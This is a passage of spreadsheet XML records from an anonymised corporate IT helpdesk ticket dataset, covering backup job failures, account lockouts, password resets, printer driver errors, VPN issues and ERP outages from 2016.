    <s v="received from: monitoring_tool@company.com_x000d__x000a_[critical] from: bma@HostName_1020.company.company.com &quot;lib5_drive2&quot;  time: 9/14/2016 11:49:50 pm_x000d__x000a_[90:1004]  device address not found. _x000d__x000a__x000d__x000a__x000d__x000a_backup statistics:_x000d__x000a_          _x000d__x000a_  session queuing time (hours)         0.00        _x000d__x000a_  -------------------------------------------      _x000d__x000a_  completed disk agents ........         11          _x000d__x000a_  failed disk agents ...........          0          _x000d__x000a_  aborted disk agents ..........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  disk agents total  ...........         11          _x000d__x000a_  ===========================================      _x000d__x000a_  completed media agents .......          1          _x000d__x000a_  failed media agents ..........          0          _x000d__x000a_  aborted media agents .........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  media agents total  ..........          1          _x000d__x000a_  ===========================================      _x000d__x000a_  mbytes total .................  148763 mb        _x000d__x000a_  used media total .............          1          _x000d__x000a_  disk agent errors total ......          0    _x000d__x000a__x000d__x000a_job bkwin_tax_interface_qa_daily failed in job_scheduler at: 09/15/2016 00:23:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="gvsabjhq cgwsbiep"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delete the charm 8111117934,  since it is no longer required"/>
    <s v="request you to delete the above charm since it is no longer required"/>
    <s v="boirqctx bkijgqry"/>
    <x v="37"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap2 failed in job_scheduler at: 09/14/2016 22:13:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap2 failed in job_scheduler at: 09/14/2016 22:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bkwin_HostName_770_inc failed in job_scheduler at: 09/14/2016 21:57:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_[major] from: bsm@HostName_1020.company.company.com &quot;HostName_770-full-backup&quot;  time: 9/14/2016 9:09:47 pm_x000d__x000a_[61:3003]   lost connection to vbda named &quot;HostName_770.company.company.com [/e]&quot;_x000d__x000a_ on host HostName_770.company.company.com._x000d__x000a_ ipc subsystem reports: &quot;ipc read error_x000d__x000a_ system error: [10054] connection reset by peer_x000d__x000a__x000d__x000a_job bkwin_HostName_770_inc failed in job_scheduler at: 09/14/2016 21:57:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="unable to load engineering_tool on my new 2-1 says that it cannot connect to internet??"/>
    <s v="see above       cell#"/>
    <s v="horzelqj ujyzldmh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn and vpn will not allow access to erp"/>
    <s v="_x000a__x000a_received from: pfzxecbo.ptygkvzl@gmail.com_x000a__x000a_this is the second time this week i have had an issue with vpn.  vpn was my workaround monday, but it is not working for me either this evening._x000a__x000a_pfzxecbo ptygkvzl_x000a_sr analyst, na indirect industrial sales_x000a_pfzxecbo.ptygkvzl@gmail.com&lt;mailto:pfzxecbo.ptygkvzl@gmail.com&gt;_x000a__x000a__x000a__x000a_"/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool phone app"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vjuxfokc.cwhxnoug@gmail.com_x000d__x000a__x000d__x000a_please see attached screenshot of the engineering_tool app._x000d__x000a__x000d__x000a_i am no longer able to check availability as the message &quot;unable to connect to availability server &quot;_x000d__x000a__x000d__x000a_i have tried uninstalling and reinstalling but didn't fix the problem?_x000d__x000a__x000d__x000a_is there a known issue?_x000d__x000a__x000d__x000a_it has been like this for a few weeks._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="vjuxfokc cwhxnoug"/>
    <x v="50"/>
  </r>
  <r>
    <s v="can you please remove quyhn mcgudftigre from usa campus calendars as requested "/>
    <s v="from: cwuospin nbhoxqpe _x000a_sent: wednesday, september 14, 2016 9:42 pm_x000a_to: othybin graceuyt; nwfodmhc exurcwkm_x000a_cc: -facility_x000a_subject: rakthyesh - re: elt update call_x000a__x000a_hello help_x000a__x000a_can you please remove quyhn mcgudftigre from usa campus calendars as requested _x000a_sincerely, _x000a__x000a_stanfghyley guhtykes, fmp_x000a_facilities manager_x000a_usa campus _x000a__x000a_on sep 14, 2016, at 11:23 am, othybin graceuyt &lt;hkrecpfv.kgwpbexv@gmail.com&gt; wrote:_x000a_hello.  please check this and see if quyhn's meetings can be removed from the calendar._x000a_ _x000a_"/>
    <s v="cwuospin nbhoxqpe"/>
    <x v="26"/>
  </r>
  <r>
    <s v="since last security update i have been unable to print anything on the network printers"/>
    <s v="error message asks me if i trust the printer, then tells me i need to download a driver for it. phone number 724-539-4869"/>
    <s v="trkwehzg pqjrhsul"/>
    <x v="0"/>
  </r>
  <r>
    <s v="application response time (other network resources work normally)"/>
    <s v="please provide details in the template below (if multiple applications are impacted, please use the quick ticket template in the &quot;operations&quot; folder)._x000d__x000a_site / location : usa_x000d__x000a_user id (ad) :steince_x000d__x000a_system you are seeing performance problems on (please list all) (e.g., crm, erp, bw, bobj):erp SID_34_x000d__x000a_transactions that are slow (e.g., va01, create an order):va01_x000d__x000a_area this belongs to (e.g., sales, finance, markhtyeting etc.):order processing_x000d__x000a_how can this issue be replicated by the it support group:_x000d__x000a_are other users seeing this? there are 5 remote users_x000d__x000a_please attach relevant screenshots and exact times when the issue occurred:"/>
    <s v="pbfscenq qvaylkne"/>
    <x v="3"/>
  </r>
  <r>
    <s v="outlook/crm error"/>
    <s v="_x000a__x000a_received from: qjiutmel.fgvtxeoy@gmail.com_x000a__x000a_neither crm or outlook will load.  i have restarted the pc 3 times. locked up several times while synchronizing with crm_x000a__x000a_login:  wghjkftewj_x000a__x000a_[image1.jpg]_x000a_[image2.jpg]_x000a__x000a_"/>
    <s v="qjiutmel fgvtxeoy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="all contacts loaded for imts -existing accounts (214 of them) did not carry all required fields over from erp crm to msd"/>
    <s v="prospect account contacts came over ok.  the contacts that came over incorrectly came over through elm "/>
    <s v="rcbdyslq zuspjbtw"/>
    <x v="39"/>
  </r>
  <r>
    <s v="job SID_37hotf failed in job_scheduler at: 09/14/2016 17:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hotf failed in job_scheduler at: 09/14/2016 17:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>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ojgxundh aegxpmvd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="office 2013 for qohfjpna exphkims shows activation required"/>
    <s v="we needed to reimage the pc of qohfjpna exphkims (palghjmal1) and now the office 2013 (that comes with the company image from deeghyupak raju) is showing that activation is required. also it shows that leslie account is not associated to that office product. she always had ms office. we just needed to reimage the pc. could you please check her account to fix that? "/>
    <s v="kbnfxpsy gehxzayq"/>
    <x v="26"/>
  </r>
  <r>
    <s v="remove"/>
    <s v="_x000a__x000a_received from: kaguhxwo.uoyipxqg@gmail.com_x000a__x000a_hi it,_x000a_please help remove rujpckto lhutkpxm on themfg_grp  group. "/>
    <s v="kaguhxwo uoyipxqg"/>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avpeklim eroqjzab"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to change password and get it synced on system"/>
    <s v="need to change password and get it synced on system"/>
    <s v="tmopbken ibzougsd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not allowing to open emails in the inbox."/>
    <s v="outlook not allowing to open emails in the inbox._x000d__x000a_connected to the user system using teamviewer_x000d__x000a_-sent a uacyltoe hxgaycze mail to the user from the user mailbox._x000d__x000a_-user confirmed he is able to open it._x000d__x000a_-advised the user to close and reopen the outllok and check._x000d__x000a_-caller confirmed that he is now able to see the emails on outlook._x000d__x000a_-issue resolved."/>
    <s v="uvrwikmy yusexirn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="external monitors not detecting with dell 2in 1 tablet"/>
    <s v="external monitors not detecting with dell 2in 1 tablet"/>
    <s v="vktxjamz whbdetvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="toeibhlp gukqjwnr"/>
    <x v="0"/>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 kd05 (hp color laserjet 4600 pcl6)_x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ? when i try to send a document to this printer, it says &quot;driver update needed&quot; next to printer name.  when i click &quot;print,&quot; it starts to download drivers, and repeats this several times, before displaying error &quot;windows cannot print due to a problem with the current printer setup.&quot;  i have printed on this printer on my machine before._x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000d__x000a_      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc) - specifically microsoft word documents, but i have also tried printing emails and excel documents_x000d__x000a__x000d__x000a_   â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls) - microsoft word, microsoft excel, microsoft outlook_x000d__x000a__x000d__x000a_   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed? - n/a_x000d__x000a__x000d__x000a_   â€¢  if erp system, which system?   (ex SID_34 / SID_38 / hrp / plm) - n/a_x000d__x000a__x000d__x000a_      â€¢  if it's an erp printer problem can the erp output be rerouted to another erp printer temporarily? - n/a_x000d__x000a_         what printer can it be rerouted too? - n/a_x000d__x000a__x000d__x000a_   â€¢  if document is not printing correctly, please scan copy of the document and attach to the ticketing_tool ticket."/>
    <s v="kpogxqvn sfzjbhet"/>
    <x v="2"/>
  </r>
  <r>
    <s v="erp SID_39 password reset"/>
    <s v="erp SID_39 password reset"/>
    <s v="iehdjwvt rndtlyhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer driver error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: sdbcpvtx.hzpctsla@gmail.com_x000d__x000a__x000d__x000a_good afternoon,_x000d__x000a__x000d__x000a_i know it isn't only happening to me but i get this error when i try to print on my normal default printer.  it says it needs a driver installed then i get this box.  when i try to get a screenshot the 'now printing' box pops up.  if i close snipping tool it goes away but pops back up every time i try to use the snipping tool to show you the error._x000d__x000a_monday bzxljkoy rvoiqthl was getting the same error._x000d__x000a__x000d__x000a_[cid:image001.png@01d20e90.37f2e370]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="sdbcpvtx hzpctsla"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pc set up for new employee -mghlisha.baranwfhrty                                  "/>
    <s v="setup laptop for new hire:mghlisha.baranwfhrty                                  "/>
    <s v="fdmaluyo tvecikxn"/>
    <x v="18"/>
  </r>
  <r>
    <s v="wifi issue"/>
    <s v="wifi is not getting connect"/>
    <s v="aqourvgz mkehgcdu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="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zujpycos pogmachd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="spam email"/>
    <s v="from: vmqcyzda kgvrfwcj _x000a_sent: wednesday, september 14, 2016 8:00 pm_x000a_to: ron port; nwfodmhc exurcwkm_x000a_cc: tjlizqgc ngvwoukp; ytqhfmwi itnakpmc; billghj dhjuyick; lipfnxsy rvjlnpef_x000a_subject: amar - fw: summit meeting_x000a_importance: high_x000a__x000a__x000a_help desk,_x000a_this email is not legit and it looks like it's for the upcoming business practice summit._x000a__x000a_best "/>
    <s v="vmqcyzda kgvrfwcj"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" pc set up for new employee "/>
    <s v=": pc set up for new employee :krisyuhnyrtkurtyar .kghpanhjuwdian"/>
    <s v="xabkyoug wdkyiqfx"/>
    <x v="18"/>
  </r>
  <r>
    <s v="pdf printer"/>
    <s v="i want  software to print documents to pdf"/>
    <s v="vwaliogd dviwuzhm"/>
    <x v="18"/>
  </r>
  <r>
    <s v="change the old pc"/>
    <s v="configure the new laptop and remove the old pc"/>
    <s v="jloygrwh acvztedi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="frequent account lockout"/>
    <s v="my account is getting locked frequently. worked with gso many times on the same and still the same. please check from your end. "/>
    <s v="akisjtzm uvbmysgc"/>
    <x v="19"/>
  </r>
  <r>
    <s v="mii uacyltoe hxgaycze from lacw8515941  : duration is high for loading  as 60.69 s and refresh loaded 5.11 s   "/>
    <s v="mii uacyltoe hxgaycze from lacw8515941  : duration is high for loading  as 39.69 s and refresh loaded 5.11 s   "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="13"/>
  </r>
  <r>
    <s v="approved expense report date range error"/>
    <s v="ess portal_x000a_expense report 3111110041 approved with wrong date range showing 8/6/16 - 9/16/16 and needs to say 8/6/16-8/12/16_x000a_need to change dates in order to enter in an expense report for dates ranging 8/22/16-8/25/16"/>
    <s v="qvtlcbyg lbnjhysc"/>
    <x v="9"/>
  </r>
  <r>
    <s v="i am locked out of skype"/>
    <m/>
    <s v="viyglzfo ajtfzpkb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to host a skype meeting from a conference room"/>
    <s v="unable to host a skype meeting from a conference room_x000a__x000a_"/>
    <s v="rcxmghtb ubveickr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip2: printer driver update"/>
    <s v="vip2: printer driver update"/>
    <s v="fabijhsd ocsnugeh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp user blocked, please unlock immediately &amp; extend the account if necessary - tomorrow is our py run"/>
    <s v="_x000a__x000a_received from: lixwgnto.krutnylz@gmail.com_x000a__x000a_please unlock user ghjvreicj immediately in erp and extend the account to 31 dec 16._x000a_it is immediately needed â€“ tomorrow is our py run!!!!_x000a__x000a_von: tszvorba wtldpncx [mailto:jreichard@ppstrixner.de]_x000a_gesendet: mittwoch, 14. september 2016 16:57_x000a_an: nkjtoxwv wqtlzvxu_x000a_cc: lixwgnto krutnylz_x000a_betreff: in erp gesperrt - bitte dringend wieder frei schalten_x000a_wichtigkeit: hoch_x000a__x000a_hallo herr hohgajnn,_x000a__x000a_ich wollte mich eben ein weiteres mal anmelden und habe auch sicher die korrekten anmeldedaten eingegeben._x000a_leider bin ich nun gesperrt._x000a_in anbetracht der bevorstehenden abrechnung benÃ¶tige ich dringend eine freischaltung in erp._x000a__x000a_vielen dank im voraus und viele grÃ¼ÃŸe_x000a__x000a__x000a_tszvorba wtldpncx_x000a_teamleitung_x000a__x000a_[logo neu final klein]_x000a__x000a_personal partner strixner gmbh_x000a__x000a__x000a__x000a_[cid:image005.jpg@01d20ea9.0c16ac00]_x000a__x000a_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lixwgnto krutnylz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset from password_management_tool"/>
    <s v="password reset from password_management_tool"/>
    <s v="afplnyxb eiomnuba"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="hetoyabq rcmliyot"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem with printing"/>
    <s v="_x000d__x000a__x000d__x000a_received from: iqcylpok.ascpqvni@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am unable to print to the network printers in my area.  i get pop ups to install the drivers but then there is an error.  please help!_x000d__x000a__x000d__x000a_"/>
    <s v="iqcylpok ascpqvni"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pricing error on order number 35022202."/>
    <s v="we are unable to change the price on the order number 35022202. can you please help us fix this issue before the inwarehouse_tool is created tonight. _x000d__x000a_"/>
    <s v="ejfgzqyk wpbujczy"/>
    <x v="12"/>
  </r>
  <r>
    <s v="erp SID_39 password reset"/>
    <s v="erp SID_39 password reset"/>
    <s v="rqtmpjdb ohitelsg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for ahydmrbu fjymgtvo on other / telephony_software"/>
    <s v="hello,_x000d__x000a_could you please reset my password to telephony_software supervisor system?_x000d__x000a_"/>
    <s v="ahydmrbu fjymgtvo"/>
    <x v="6"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="name:afplnyxb eiomnuba_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:afplnyxb.eiomnuba@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:the password for my vpn is blokker again._x000a_can you please reset teh password? username is vanghtydec_x000a_do i have to change the password after you have unlocked it?"/>
    <s v="afplnyxb eiomnuba"/>
    <x v="0"/>
  </r>
  <r>
    <s v=":unable to log on to outlook this morning"/>
    <s v="unable to log on to outlook this morning_x000d__x000a__x000d__x000a_microsoft crm add-in was corrupted"/>
    <s v="eziswfym cehwzojy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to get skype calls"/>
    <s v="name:bixsapwu lcamiopz _x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:bixsapwu.lcamiopz@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:is there a reason that skype will not call me at a conference room in the usa campus"/>
    <s v="bixsapwu lcamiopz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power outage: vogelfontein ,sa vpn circuit is down at 9:47 am et on 09/14. site is up on primary."/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______ 9:47 am et on 09/14_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update user to interaction desktop"/>
    <s v="update user to interaction desktop_x000d__x000a_ypdhesrq eotjzyxm_x000d__x000a_rqll8516072 "/>
    <s v="ypdhesrq eotjzyxm"/>
    <x v="6"/>
  </r>
  <r>
    <s v="infotype 0017 for 2016-09-01 does not exist for personal no 5650555"/>
    <s v="infotype 0017 for 2016-09-01 does not exist for personal no 5650555_x000a__x000a_phone: +"/>
    <s v="wjkzgyxh pktcqbxu"/>
    <x v="9"/>
  </r>
  <r>
    <s v="unable to install the gd&amp;t font"/>
    <s v="name: ovxwqybe gevzkrlp_x000a_email: ovxwqybe.gevzkrlp@gmail.com_x000a_telephone: _x000a_summary: need gd&amp;t font installed"/>
    <s v="ovxwqybe gevzkrlp"/>
    <x v="2"/>
  </r>
  <r>
    <s v="re: ticket_no1533125 -- comments added"/>
    <s v="_x000a__x000a_received from: pfzxecbo.ptygkvzl@gmail.com_x000a__x000a_screen prints are attached to highlight the same fields i had listed in the spreadsheet provided._x000a__x000a_this is a live SID_1 example that can be reviewed, incase you werent aware._x000a_[cid:image005.jpg@01d20e69.4b484c70]_x000a_[cid:image006.jpg@01d20e69.4b484c70]_x000a_[cid:image008.jpg@01d20e69.4b484c70]_x000a__x000a_[cid:image012.jpg@01d20e69.4b484c70]_x000a__x000a_from: pfzxecbo ptygkvzl_x000a_sent: friday, september 09, 2016 3:56 pm_x000a_to: company@ticketing_tool.com_x000a_cc: raghfhgh gowhjtya &lt;froajhdb.ijetmkuc@gmail.com&gt;_x000a_subject: re: ticket_no1533125 -- comments added_x000a__x000a_example attached._x000a__x000a_SID_1- v-11119004_x000a__x000a_if there are any questions, please let me know."/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="8"/>
  </r>
  <r>
    <s v="SID_78user locked out"/>
    <s v="SID_78user locked out"/>
    <s v="vhfucgar kwrstxqu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mii update"/>
    <s v="mii update"/>
    <s v="dpuifqeo eglwsfkn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to vpn"/>
    <s v="unable to login to vpn as the page stopped at checking antivirus client "/>
    <s v="lckagtry xcrmzgli"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error - failed to reset cached password."/>
    <s v="locked and unlocked the pc with the new password._x000d__x000a_updated password for email access and companysecure on cell phone"/>
    <s v="aylrbosw gaeycbwd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vmsliazh ltksxmyv edksm005 please change schedule of job &quot;import complete erp data (nightly)&quot;"/>
    <s v="the files at 0:30 h seems to have missing records. later files seems to be complete _x000d__x000a_the nightly update for milano runs at 3:30 too - this simplyfies support_x000d__x000a__x000d__x000a_please change the values in the field &quot;occurs once at&quot; and starting at in the attached schedule picture from 0:30 to 3:30 h_x000d__x000a__x000d__x000a_"/>
    <s v="iewnguxv bufwxeiy"/>
    <x v="48"/>
  </r>
  <r>
    <s v="speakers not working, "/>
    <s v="issue: speakers are not working._x000d__x000a_troubleshooting:-_x000d__x000a_-ran hardware troubleshooter got the message that no speaker, hehr_toolhone connected to device._x000d__x000a_-checked in device manager realtek  audio driver was installed tried updating it, but no update available._x000d__x000a_-tried downloading driver from dell.com/support but as speaker is not installed in the system unable to install any driver._x000d__x000a_-checked playing an audio using earphone and it worked fine, confirming its an issue with the hardware._x000d__x000a__x000d__x000a_conclusion: either speaker is not installed or is not working"/>
    <s v="gzjtweph mnslwfqv"/>
    <x v="18"/>
  </r>
  <r>
    <s v="outlook not responding after crm sync."/>
    <s v="outlook not responding after crm sync."/>
    <s v="hduzwpio wrcgunso"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset prtgghj4k password"/>
    <s v="please reset my prtgghj4k password."/>
    <s v="horeduca ogrhivnm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can not print to tc 28 or tc19 on HostName_769"/>
    <s v="since the mandatory it reboot on monday trkwehzg pqjrhsul and i have been unable to print to tc28. i tried tc19 this morning and was also unsuccessful. when attempting to print, a dialogue box pops up and copies some dll files to the c:\ drive. then an error message pops up saying &quot;there was an error when printing started. check printer setup in windows control panel.&quot; i tried to update the driver from the control panel and the same dll files are downloaded as when i attempt to print. i've tried printing from several applications (outlook, excel, adobe reader) with no success. other users are still able to print to the printer, it just spit out an erp order from one of the engineers._x000d__x000a__x000d__x000a_"/>
    <s v="qhisflec okxaytiv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype audio functionality is not working as per expected"/>
    <s v="skype audio functionality is not working as per expected"/>
    <s v="ekvtdcyq grncjlho"/>
    <x v="26"/>
  </r>
  <r>
    <s v="locked out of SID_37. please reset password"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):_x000d__x000a__x000d__x000a_enter user id of user having the issue:_x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with:_x000d__x000a__x000d__x000a_describe the issue:_x000d__x000a__x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000d__x000a__x000d__x000a_provide access the same as this other user:"/>
    <s v="wxievyng lfecyzik"/>
    <x v="19"/>
  </r>
  <r>
    <s v="outlook password prompt"/>
    <s v="microsoft connectivity analyzer software confirms that the software is too old to support._x000d__x000a_downloading and installing the service pack fails - no supported software found._x000d__x000a_repaired ms office installation, cleared credentials manager, deleted profile, and contents of app data, local, ms, outlook, restarted pc._x000d__x000a_microsoft office 2010 version "/>
    <s v="srzxoiuj yjvabrzl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp issue for invoicing, insufficient stock mm#2247736 even though there is inventory available."/>
    <s v="customer service at usa, issues sales orders for acct #81254672. consignment inventory shows stock but there may be a batch block that prevents them from allocating inventrtgoy for billing purposes. there is something odd with mm2247736, mb58, erp. this is maghyuigie ghjkzalez, ph . "/>
    <s v="houcdelq wnypackq"/>
    <x v="12"/>
  </r>
  <r>
    <s v="can't open attached inwarehouse_tools with opentext at erp - see attachment"/>
    <s v="can't open attached inwarehouse_tools with opentext at erp - see attachment"/>
    <s v="rnajgdmb fioznltc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="transfer tool trial reports from old laptop to new laptop"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jkpwisnf.lgpdyncm@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a_could you please help me in subjected case._x000d__x000a__x000d__x000a_"/>
    <s v="jkpwisnf lgpdyncm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile phone"/>
    <s v="no e-mail receipt for user jkuaslxe hrodszpl and gezpktrq opkqwevj_x000a__x000a_would you please contact above users as they are currently not receiving e-mails on their mobile phone._x000a_jkuaslxe hrodszpl    _x000a_gezpktrq opkqwevj _x000a__x000a_please note that they are currently travelling outside of germany."/>
    <s v="atlwdyej vtlhzbix"/>
    <x v="63"/>
  </r>
  <r>
    <s v="mii not working"/>
    <s v="mii is taking more than 5 min to load. when it does load everyone is getting a br error (attached)"/>
    <s v="omufjcxr ahypftjx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wl43 scanner not working."/>
    <s v="wl43 scanner not working. printer is working fine. only the scanner is not working._x000a__x000a_phone: "/>
    <s v="bjtguqne xthqrzpc"/>
    <x v="32"/>
  </r>
  <r>
    <s v="file server not functioning"/>
    <s v="the lights at the back of one of the file servers on site is not blinking._x000d__x000a_part of the plant does not access to network resources._x000d__x000a__x000d__x000a_please help check._x000d__x000a__x000d__x000a_local file servers_x000d__x000a__x000d__x000a_\\HostName_1259 - _x000d__x000a_\\lrrsm007 - _x000d__x000a_\\HostName_1260_x000d__x000a__x000d__x000a_contact  # 252 536 5209"/>
    <s v="jrigdbox bgyluoqn"/>
    <x v="11"/>
  </r>
  <r>
    <s v="shop_floor_app password misplaced."/>
    <s v="name:deghjick culghjn_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:cizplrvw.ymxgteir@gmail.com_x000a_customer number:_x000a_telephone_x000a_summary:i have forgotten my password to shop_floor_app"/>
    <s v="cizplrvw ymxgteir"/>
    <x v="42"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="ykrteqjw lvxqjydf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the erp - mii  HostName_343 :  jstart.exe service is showing as critical."/>
    <s v="the erp - mii  HostName_343 : jstart.exe service is showing as critical."/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="13"/>
  </r>
  <r>
    <s v="mii technical error across usa location."/>
    <s v=":in usa we are receiving a technical error on the mii system and i cannot even log off_x000a__x000a_contact number: "/>
    <s v="aqgphjbc utjrsedy"/>
    <x v="40"/>
  </r>
  <r>
    <s v="bearbeitung der aktuellen situation nicht mÃ¶glich"/>
    <s v="_x000d__x000a__x000d__x000a_received from: znqlmjvt.uhyokzlt@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_das file ist unter folgenden link verfÃ¼gbar._x000d__x000a__x000d__x000a__x000d__x000a_seit heute frÃ¼h ist es nicht mehr mÃ¶glich die datei zu bearbeiten, da folgende fehlermeldung beim Ã¶ffnen der datei eingeblendet wird._x000d__x000a__x000d__x000a_[cid:image002.png@01d20e87.e5b872d0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ssen / best "/>
    <s v="znqlmjvt uhyokzlt"/>
    <x v="15"/>
  </r>
  <r>
    <s v="mii uacyltoe hxgaycze from lacw8515941  : duration is high for loading  as 39.69 s and refresh loaded 19.11 s   "/>
    <s v="mii uacyltoe hxgaycze from lacw8515941  : duration is high for loading  as 39.69 s and refresh loaded 19.11 s   "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp mii is not functioning."/>
    <s v="erp mii is not functioning in raonoke rapids. employees are unable to use the software to clock out. software is locked._x000a__x000a_phone: "/>
    <s v="nrmjhuox ktuyqewp"/>
    <x v="40"/>
  </r>
  <r>
    <s v="bnsh0901 account unlock in erp SID_34"/>
    <s v="bnsh0901 account unlock in erp SID_34"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account lockout"/>
    <s v="windows account lockout"/>
    <s v="zlkhvseb bpzvrhsj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client not responding"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rjanhbde.owfkyjcp@gmail.com_x000d__x000a__x000d__x000a_helloâ€¦_x000d__x000a__x000d__x000a_refer the below screen shotâ€¦._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image003.jpg@01d20ea1.751c5400]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_warm "/>
    <s v="rjanhbde owfkyjcp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 09/14/2016 06:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 09/14/2016 06:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="printer problem / issue information i am trying to print to tc78 on hqntn06. drivers need updated."/>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tc78 on hqntn06_x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ? drivers need updated, but will not load._x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) all_x000d__x000a_      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000d__x000a__x000d__x000a_   â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls) windows_x000d__x000a__x000d__x000a_   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed? no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jusenflm sufbehom"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cobsfvjz.apkqmrdu@gmail.com_x000d__x000a__x000d__x000a_dear sir/madam_x000d__x000a__x000d__x000a_i am not able to connect to vpn ._x000d__x000a__x000d__x000a_please address ._x000d__x000a__x000d__x000a_also install the new apvpn as well ._x000d__x000a__x000d__x000a_"/>
    <s v="cobsfvjz apkqmrdu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ng_ff90 account unlock in erp SID_34"/>
    <s v="ng_ff90 account unlock in erp SID_34"/>
